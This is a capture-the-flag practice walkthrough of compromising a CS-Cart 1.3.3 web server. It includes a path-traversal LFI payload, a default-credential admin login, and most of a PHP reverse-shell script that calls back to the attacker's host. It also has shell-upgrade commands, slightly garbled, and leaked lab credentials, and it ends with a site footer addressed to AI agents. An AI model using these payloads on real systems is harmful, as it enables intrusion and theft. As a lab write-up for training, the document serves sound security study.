> For the complete documentation index, see [llms.txt](https://www.davila.me/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.davila.me/menu/walkthroughs/oscp-practice/payday.md). # PayDay nmap shows lots of open ports to try and go down rabbit holes. ![](/files/N78Inzco1n2aVHrJEAS3) doing a service and version scan we get more information. we see that the server is running a php shopping cart software called 'cs-cart' ![](/files/ZPiSVxNPOBB8FCbRBLBH) A quick google search tells us we can find the version by going to $domain/?version and we see that the server is running version 1.3.3. This version shows up in searchsploit with local file inclusion (LFI) and RCE (remote code execution). This seems to be our way in. ![](/files/Zc44OQSgXiPhaf5EIg32) using the unauthenticated LFI (classes/phpmailer/class.cs\_phpmailer.php?classes\_dir=../../../../../../../../../../../etc/passwd%00) we are able to see that we have a user called 'patrick' on the system. ![](/files/nVxtz4dHlBsU9u7tsGAV) We see the authenticated RCE ability for a reverse shell in searchsploit but we need to be able to upload a file. Doing another search online we see that we need to access the admin settings by going to $domain/admin.php. Thankfully a simple admin / admin lets us through since this is a default install. I tried using Google Chrome through Burp however, it kept logging out after every click. The template interface also failed to load all the way and would stay with a 'loading' message that would not let me proceed. ![](/files/4vfBNflQIuU4atGIjIud) Frustrated, I tried Firefox just in case and of course it worked beautifully. No session issues, and no spinning 'loading' message. ![](/files/XJCv5cHFA8t1dmQboddb) I uploaded PenTest Monkey's Reverse PHP script and was able to get a call back without issues. This is the PHP script I used. ``` array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?> ``` We now have local access to the server and can retrieve our flag. We upgrade our janky shell by doing these commands (no python3 on this machine) ``` python3 -c 'import pty;pty.spawn("/bin/bash")' ctrl+z stty raw -echo; fg; reset export TERM=xterm export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin/usr/bin:/sbin:/binusr/local/sbin:/usr/local/bin:/usr/sbin: ``` ![](/files/vfFp6tAAtGqOSxqIPLYt) Now we can work on our privsec. Couple of commands to get some basic information Going through the cscart files we see that the database username and password are root / root. ![](/files/g2qNNEbhsYVCDG7NSiOU) We also see a password for user `brett / ilovesecuritytoo` under `/root/capture.cap`. Just in case I tried that password for root through ssh and did not work. Running LSE shows us something interesting but nothing came out of it. Probably a false positive? ![](/files/fxPlSypHGQqrOpN2ts6U) The other interesting thing is that we have access to a folder that is being used by the system crontab. This is our most likely way to get root access. ![](/files/2s3yICMmllRrE5jfZY45) This a BS box. The way in was to GUESS that patrick's password was patrick and he already has sudo access.... GG. --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.davila.me/menu/walkthroughs/oscp-practice/payday.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.